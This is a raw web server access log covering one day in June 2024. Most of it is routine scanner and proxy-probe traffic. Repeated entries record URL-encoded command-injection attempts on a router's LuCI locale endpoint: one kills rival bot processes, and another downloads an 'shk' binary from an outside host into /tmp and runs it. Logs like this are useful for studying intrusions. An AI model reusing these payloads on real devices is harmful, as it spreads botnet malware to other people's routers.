45.128.232.200 - - [28/Jun/2024:00:03:56 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 149.50.103.48 - - [28/Jun/2024:00:11:45 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [28/Jun/2024:00:18:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.92.251.254 - - [28/Jun/2024:00:19:12 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 45.95.169.184 - - [28/Jun/2024:00:20:47 +0200] "-" 400 1930 206.168.32.102 - - [28/Jun/2024:00:59:15 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [28/Jun/2024:00:59:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [28/Jun/2024:00:59:19 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [28/Jun/2024:01:02:47 +0200] "GET / HTTP/1.1" 200 1895 41.217.41.99 - - [28/Jun/2024:01:04:11 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [28/Jun/2024:01:15:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:01:15:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.156.130.6 - - [28/Jun/2024:01:36:07 +0200] "GET /favicon.ico HTTP/1.1" 404 729 79.137.194.145 - - [28/Jun/2024:02:18:04 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 138.197.166.201 - - [28/Jun/2024:02:27:10 +0200] "-" 400 1930 138.197.166.201 - - [28/Jun/2024:02:27:10 +0200] "-" 400 1930 138.197.166.201 - - [28/Jun/2024:02:27:10 +0200] "GET / HTTP/1.1" 200 1895 138.197.166.201 - - [28/Jun/2024:02:27:10 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 45.128.232.200 - - [28/Jun/2024:02:35:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 149.50.103.48 - - [28/Jun/2024:02:49:26 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [28/Jun/2024:02:55:57 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 141.98.83.197 - - [28/Jun/2024:03:07:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:03:07:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [28/Jun/2024:03:23:15 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [28/Jun/2024:03:52:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [28/Jun/2024:04:22:14 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [28/Jun/2024:04:46:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.244.36.206 - - [28/Jun/2024:04:55:28 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [28/Jun/2024:05:05:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:05:05:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [28/Jun/2024:05:57:17 +0200] "GET / HTTP/1.1" 200 1895 159.65.178.181 - - [28/Jun/2024:06:00:06 +0200] "-" 400 1930 159.65.178.181 - - [28/Jun/2024:06:10:38 +0200] "-" 400 1930 64.112.72.166 - - [28/Jun/2024:06:19:58 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 141.98.83.197 - - [28/Jun/2024:07:03:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:07:03:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [28/Jun/2024:07:10:05 +0200] "GET / HTTP/1.1" 200 1895 159.65.178.181 - - [28/Jun/2024:07:15:45 +0200] "GET / HTTP/1.1" 200 1895 159.65.178.181 - - [28/Jun/2024:07:15:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.32.97 - - [28/Jun/2024:07:31:38 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.97 - - [28/Jun/2024:07:31:41 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.97 - - [28/Jun/2024:07:31:41 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [28/Jun/2024:07:58:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 78.108.177.51 - - [28/Jun/2024:09:21:39 +0200] "GET / HTTP/1.0" 200 1895 141.98.11.15 - - [28/Jun/2024:09:43:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.66.76.134 - - [28/Jun/2024:09:48:39 +0200] "-" 400 1930 149.50.103.48 - - [28/Jun/2024:09:51:42 +0200] "GET / HTTP/1.1" 200 1895 172.169.110.129 - - [28/Jun/2024:09:52:42 +0200] "-" 400 1930 149.50.103.48 - - [28/Jun/2024:09:57:56 +0200] "GET / HTTP/1.1" 200 1895 13.64.108.206 - - [28/Jun/2024:10:02:36 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [28/Jun/2024:10:02:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:10:02:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [28/Jun/2024:10:03:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.200 - - [28/Jun/2024:10:11:56 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 149.50.103.48 - - [28/Jun/2024:11:12:50 +0200] "GET / HTTP/1.1" 200 1895 193.37.252.115 - - [28/Jun/2024:11:39:34 +0200] "GET / HTTP/1.1" 200 1895 193.37.252.115 - - [28/Jun/2024:11:39:34 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 198.235.24.29 - - [28/Jun/2024:11:44:38 +0200] "-" 400 1930 198.235.24.29 - - [28/Jun/2024:11:44:38 +0200] "-" 400 1930 205.210.31.222 - - [28/Jun/2024:12:02:43 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [28/Jun/2024:12:06:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.105 - - [28/Jun/2024:12:17:13 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 149.50.103.48 - - [28/Jun/2024:12:26:01 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [28/Jun/2024:12:26:27 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [28/Jun/2024:12:26:30 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [28/Jun/2024:12:26:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 80.82.78.39 - - [28/Jun/2024:12:39:19 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [28/Jun/2024:12:39:22 +0200] "-" 400 1930 52.186.169.216 - - [28/Jun/2024:13:13:20 +0200] "GET /logs HTTP/1.1" 404 722 64.62.197.157 - - [28/Jun/2024:13:23:08 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.166 - - [28/Jun/2024:13:23:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.152 - - [28/Jun/2024:13:23:47 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.165 - - [28/Jun/2024:13:23:59 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 149.50.103.48 - - [28/Jun/2024:13:40:41 +0200] "GET / HTTP/1.1" 200 1895 185.180.140.4 - - [28/Jun/2024:13:55:28 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [28/Jun/2024:14:46:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:14:46:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 65.49.20.104 - - [28/Jun/2024:14:46:36 +0200] "-" 400 1930 59.178.191.253 - - [28/Jun/2024:14:49:23 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [28/Jun/2024:14:49:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [28/Jun/2024:14:56:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [28/Jun/2024:15:03:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 199.204.96.230 - - [28/Jun/2024:15:17:26 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [28/Jun/2024:15:24:28 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [28/Jun/2024:15:32:06 +0200] "GET / HTTP/1.1" 200 1895 146.190.78.19 - - [28/Jun/2024:15:46:41 +0200] "-" 400 1930 146.190.78.19 - - [28/Jun/2024:15:46:42 +0200] "-" 400 1930 146.190.78.19 - - [28/Jun/2024:15:46:42 +0200] "GET / HTTP/1.1" 200 1895 146.190.78.19 - - [28/Jun/2024:15:46:42 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 51.159.211.54 - - [28/Jun/2024:16:16:10 +0200] "CONNECT paypal.com:443 HTTP/1.1" 400 804 141.98.83.197 - - [28/Jun/2024:16:38:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:16:38:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 189.191.240.147 - - [28/Jun/2024:16:44:14 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 149.50.103.48 - - [28/Jun/2024:16:46:07 +0200] "GET / HTTP/1.1" 200 1895 112.46.212.152 - - [28/Jun/2024:17:09:12 +0200] "GET / HTTP/1.1" 400 771 81.163.56.101 - - [28/Jun/2024:17:15:41 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.52 - - [28/Jun/2024:17:30:21 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.52 - - [28/Jun/2024:17:30:25 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.52 - - [28/Jun/2024:17:30:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 194.59.31.99 - - [28/Jun/2024:18:30:13 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 141.98.83.197 - - [28/Jun/2024:18:51:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:18:51:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 164.68.114.58 - - [28/Jun/2024:18:56:22 +0200] "GET /logs HTTP/1.1" 404 722 87.121.69.27 - - [28/Jun/2024:19:07:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.103 - - [28/Jun/2024:19:31:29 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [28/Jun/2024:19:31:32 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [28/Jun/2024:19:31:33 +0200] "GET /favicon.ico HTTP/1.1" 404 729 106.75.33.113 - - [28/Jun/2024:19:52:41 +0200] "GET / HTTP/1.1" 200 1895 106.75.169.16 - - [28/Jun/2024:19:57:43 +0200] "GET / HTTP/1.1" 200 1895 106.75.169.16 - - [28/Jun/2024:19:57:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.145.98 - - [28/Jun/2024:19:59:12 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.98 - - [28/Jun/2024:19:59:16 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.98 - - [28/Jun/2024:19:59:16 +0200] "GET /favicon.ico HTTP/1.1" 404 729 104.168.70.165 - - [28/Jun/2024:20:29:58 +0200] "GET / HTTP/1.1" 200 1895 54.37.200.232 - - [28/Jun/2024:20:35:02 +0200] "CONNECT ssl-judge2.api.proxyscrape.com:443 HTTP/1.1" 400 804 54.37.200.232 - - [28/Jun/2024:20:35:02 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [28/Jun/2024:21:12:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.83.197 - - [28/Jun/2024:21:51:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:21:51:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 164.90.170.137 - - [28/Jun/2024:21:55:32 +0200] "-" 400 1930 164.90.170.137 - - [28/Jun/2024:21:56:10 +0200] "GET /hello HTTP/1.1" 404 723 87.121.69.27 - - [28/Jun/2024:22:47:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 51.159.101.211 - - [28/Jun/2024:23:18:06 +0200] "HEAD / HTTP/1.1" 200 - 51.159.101.211 - - [28/Jun/2024:23:18:10 +0200] "GET / HTTP/1.1" 200 1895 51.159.101.211 - - [28/Jun/2024:23:18:14 +0200] "-" 400 1930 47.254.244.66 - - [28/Jun/2024:23:34:52 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [28/Jun/2024:23:39:58 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 141.98.83.197 - - [28/Jun/2024:23:42:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [28/Jun/2024:23:42:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.156.129.54 - - [28/Jun/2024:23:51:15 +0200] "GET / HTTP/1.1" 200 1895 45.156.129.54 - - [28/Jun/2024:23:51:15 +0200] "GET /wp-content/plugins/wp-central/readme.txt HTTP/1.1" 404 770 87.246.7.54 - - [28/Jun/2024:23:51:41 +0200] "GET / HTTP/1.0" 200 1895